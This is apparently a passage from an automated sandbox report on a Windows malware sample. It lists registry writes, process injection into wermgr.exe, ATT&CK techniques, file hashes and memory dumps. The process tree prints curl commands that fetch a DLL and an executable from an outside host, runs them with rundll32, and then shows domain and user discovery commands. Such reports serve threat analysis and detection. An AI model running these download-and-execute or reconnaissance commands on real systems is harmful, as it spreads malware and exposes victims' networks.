Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = 2420e433bcd5096f1d4749e992ea21b22f328cfdfd481c8242872c981d25e12b1f74b54b75fbc4b1b60173f30b3a69acc7701cfa3c1cefea835061e878a7d84de11a3d825c99beb9db193e9d1d112676904fa123b9c3fa26fb4c449e9669d58e6bd42650156016a817c2c5c57bdcbad7ff7e47a6db7728dd7b1121a95e31883ceeb64e81596e4d7d54772f2c719f4fa0be	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\8a43d291 = 6508ab8d8d718420f5a9ade74f25687927113446692d9a8e385798c52d7d148f826d6c399ae3fce028fb061ba28be30a28af3f5668390b65e58297e439198c3f57ee79f8a58fdece075b5d1ff63ecffbfb	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\7335b0c7 = a52a3161b4c4a30081140925ce53d8585ea40d165c1e2c160943f5339f0c890d678f8dcfec116585d22fef2b167894fadb83e8f69e3f45e49f5a9f02d8780c22f57da39e46ead1022093bc1a042a36ebc103858c2cc49750f5be7445b42340343a2b9b36999a355c1fe1e010c85fb50ee2df9062dd1127574a0c57dc09d94d3985a730346f73054fd3f43ae22e36f398bf	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = 25f0598a526943115ac0a609c0a92267de4e90f6657c827797c628e70c1ee52d4b1b5a16d94815397a0a3b45006bdf3fa90353db83698456fea39585bf50dcf23d6a5ee59d17ed0a3de24efe146c807853797b29a763d4bcbe0807d8d2f800d6a58ef0c6a88f031315f7343a66d1eae180c0cb537960bcff304df37722227faebc8c7201b9ea23f66d492c95303f0c1945	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\950cc9ba = 864fefe6dcde5766296ca3ab2a9a0fee130908d84c4a817bc962de8c412347b7776c601360d285bf283de100159df7569658808369f6ee04569b167dfed95a8e96e69adc48204952ea78af257125df963b1a8d10d8819da6754ef44f05bdd8a54a	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\7335b0c7 = c706f805bc273a8ce0975abd9a1c7475b348a3266ee6c11ee73793f04688f70eeef7a5fb17ea2c27ce3a85f8ff50201f9b132a1949b3209add8dbb818faef066816082c5c5ca5d84151b9101ff65d2d706147dfd9205204c9efda647dac043c57b3a55bad205cb9afadf33f481e25f48473aa8f1e304b5e91664c6339cc2398fcdfc4820d3a4413a4370991753053e732f	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\8a43d291 = 6549e1aff0991e8fb53afacd94e7e741f715d2149bdaea3c78675b63493ff813e2e9c7d298317f9f42563b95cad6f43e85b8789205a4bae2560137dd3cf88d0a615b74e98e57550fc8794f0b01234f34ed	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\7335b0c7 = c4d65a012198e00ba790b7fced7b27eff2506fd593e39a0ca446d061ed2b181e89d1bbaceb58fe6f949d7ea9fe052341798fb50e835ab522013ed6011d408faf6b812b1e708d7880d25f6a4ee44fa78a0d36131b5bd77bc9c1eca6277daa47a969d6160a5ebcebe821b3610538c7857e5e4c86344e8819635ff5b256b3203ad24c0bc5a38b9f5223c2f92f6c0ecffdc144	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\6c7aabec = 653a56d761d5bee44e070ac985dddcb2009f9349843fc853ed46bb6b47bd000b0e9d4085b691897eb1ed57a4550072e9d81d122b630c9f62125e81a2a5c70973abcf689bd480d49657d528861b20c84ac3e305530de0b482578a672cce79497cf0d58cc4eb5949917dd5685f1c38de4c6616c65bade8edfdae04eff8499eecf5c6e7f67ae71e6cbe18100b519465cba8ec	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\950cc9ba = 4746e8ded65beb966e9e42cea2696ecf8d021c3aac025a3ebdfd978275cfc6c3b3c713d1586d0b96338abbe05740d84c1f4c5ceeff783859a482584df55caa4d150460fc5071c11730fb5bc0d4a8108831fe6d9bea5342f02ea0f9eb6581cc5c42	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\7335b0c7 = e706c39238b2dd19d2818f347b0e057dd3666ace693f9577636abe5d115cd677442c0ff89a8a81dbbd056f940676f1e704a68e6a7a1734e58005ca17907dab7b6caba6b902a70fbe61c50917cda1fc324c9e57876c55a0d63ab226dbefe518b7abba722de1fa0560bf5a8cedc6bb4578d6af2bdd336142cb5e122a9ebe9e3e30e26b3eaf22fd20d3d7fad69b0dbf7e2a09	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\249aa588 = c62da89905530d59e833299259541e858fe14a1b2d64a036a15d6bac0f1f23c20036d018e7060509adf30da0624476d0548419bbac786ee162f9e6c02f7aadac74a3bebad296bf31cdc2fa77725ebdeab17f21ce0b366433af994a1da2368c85691f7fa56a92255a5df9942cb070495fffbc9dbd58503ea634f71b270c20288cec	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\zzgamojysvm\7335b0c7 = 050f66968287746cec356da1dfa2a30642dddc30cdc215f65b4fde7e5fe1338ffc32c1312dc1a4198165c1f937763f698efca7be1c3291076741d2bd6f991e536fde85ecceca6ed633433b4911819179778068626b1d204147533017e85b05097bdbd8863ed3bfad18beffd0a4f754b22e76334d8e4044bba42ca9097d88172fead9c190c736d626fd25ab72d0a19abc12	wermgr.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2368 PING.EXE

pid	process
2368	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

rundll32.exewermgr.exe

pid	process
3112	rundll32.exe
3112	rundll32.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe
2924	wermgr.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

Processes:

whoami.exemsiexec.exe

description	pid	process
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeDebugPrivilege	2092	whoami.exe
Token: SeSecurityPrivilege	2604	msiexec.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

cmd.exerundll32.exewermgr.exe

description	pid	process	target process
PID 5080 wrote to memory of 3032	5080	cmd.exe	curl.exe
PID 5080 wrote to memory of 3032	5080	cmd.exe	curl.exe
PID 5080 wrote to memory of 3112	5080	cmd.exe	rundll32.exe
PID 5080 wrote to memory of 3112	5080	cmd.exe	rundll32.exe
PID 3112 wrote to memory of 2924	3112	rundll32.exe	wermgr.exe
PID 3112 wrote to memory of 2924	3112	rundll32.exe	wermgr.exe
PID 3112 wrote to memory of 2924	3112	rundll32.exe	wermgr.exe
PID 3112 wrote to memory of 2924	3112	rundll32.exe	wermgr.exe
PID 3112 wrote to memory of 2924	3112	rundll32.exe	wermgr.exe
PID 5080 wrote to memory of 1912	5080	cmd.exe	curl.exe
PID 5080 wrote to memory of 1912	5080	cmd.exe	curl.exe
PID 5080 wrote to memory of 2368	5080	cmd.exe	PING.EXE
PID 5080 wrote to memory of 2368	5080	cmd.exe	PING.EXE
PID 5080 wrote to memory of 1856	5080	cmd.exe	qd_x86.exe
PID 5080 wrote to memory of 1856	5080	cmd.exe	qd_x86.exe
PID 5080 wrote to memory of 1856	5080	cmd.exe	qd_x86.exe
PID 2924 wrote to memory of 4680	2924	wermgr.exe	ipconfig.exe
PID 2924 wrote to memory of 4680	2924	wermgr.exe	ipconfig.exe
PID 2924 wrote to memory of 2092	2924	wermgr.exe	whoami.exe
PID 2924 wrote to memory of 2092	2924	wermgr.exe	whoami.exe
PID 2924 wrote to memory of 208	2924	wermgr.exe	nltest.exe
PID 2924 wrote to memory of 208	2924	wermgr.exe	nltest.exe
PID 2924 wrote to memory of 948	2924	wermgr.exe	qwinsta.exe
PID 2924 wrote to memory of 948	2924	wermgr.exe	qwinsta.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\u2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5080

C:\Windows\system32\curl.exe
curl -o 02.dll https://upd5.pro/update/02.dll
2⤵
PID:3032

C:\Windows\system32\rundll32.exe
rundll32.exe 02.dll,checkit
2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3112

C:\Windows\System32\wermgr.exe
C:\Windows\System32\wermgr.exe
3⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2924

C:\Windows\System32\ipconfig.exe
ipconfig /all
4⤵
- Gathers network information
PID:4680

C:\Windows\System32\whoami.exe
whoami /all
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2092

C:\Windows\System32\nltest.exe
nltest /domain_trusts /all_trusts
4⤵
PID:208

C:\Windows\System32\qwinsta.exe
qwinsta
4⤵
PID:948

C:\Windows\system32\curl.exe
curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
2⤵
PID:1912

C:\Windows\system32\PING.EXE
ping -n 5 localhost
2⤵
- Runs ping.exe
PID:2368

C:\Users\Admin\AppData\Local\Temp\qd_x86.exe
qd_x86.exe
2⤵
- Executes dropped EXE
PID:1856

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2604

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\02.dll
Filesize
3.5MB

MD5
4b7b85d70329e085ab06dcdf9557b0a0

SHA1
3a277203cb4916eb1f55f867f0bd368476c613fb

SHA256
49220571574da61781de37f35c66e8f0dadb18fdedb6d3a1be67485069cfd4b0

SHA512
50087b509b58a50db0a67f2aea2838c2783fb2d1d6f5a22d3a68b31e0cdfa7b3b5d469df16af437a6396d3f8dc75fafd689f9af9ce72bfb0c541a3f37ef77f03

Download Submit
C:\Users\Admin\AppData\Local\Temp\qd_x86.exe
Filesize
522KB

MD5
31b1a881401e0ba0cad4c56f1e32c48e

SHA1
19e491a4c69de056c77d05ba671870818d4f7f80

SHA256
7215d9421e0a6d1a7cfde3f6d742670550fed009585ab35b53cbb845f63c5f74

SHA512
459d6e38e633f22877add0b862319aa65484a015225e24cfea64d3bbebcde171d75857c063033035897a1d848b7c87833d0e3581d57558c0663b433db8b0154c

Download Submit
memory/2924-57-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-82-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-101-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-100-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-58-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-99-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-98-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-15-0x0000023A75D40000-0x0000023A75D42000-memory.dmp

Filesize
8KB

Download
memory/2924-16-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-97-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-96-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-24-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-95-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-27-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-25-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-36-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-37-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-38-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-39-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-40-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-92-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-46-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-49-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-50-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-59-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-52-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-53-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-56-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-91-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-90-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-51-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-64-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-65-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-66-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-67-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-70-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-71-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-72-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-73-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-76-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-77-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-78-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-79-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-89-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-83-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-85-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/2924-86-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp

Filesize
188KB

Download
memory/3112-8-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp

Filesize
188KB

Download
memory/3112-11-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp

Filesize
188KB

Download
memory/3112-9-0x0000028D0E090000-0x0000028D0E0BD000-memory.dmp

Filesize
180KB

Download
memory/3112-4-0x0000028D0E0C0000-0x0000028D0E0EF000-memory.dmp

Filesize
188KB

Download
memory/3112-26-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp

Filesize
188KB

Download
memory/3112-23-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp

Filesize
188KB

Download
memory/3112-22-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp

Filesize
188KB

Download
memory/3112-13-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp

Filesize
188KB

Download
memory/3112-14-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp

Filesize
188KB

Download
memory/3112-12-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp

Filesize
188KB

Download
memory/3112-3-0x0000028D0E090000-0x0000028D0E0BD000-memory.dmp

Filesize
180KB

Download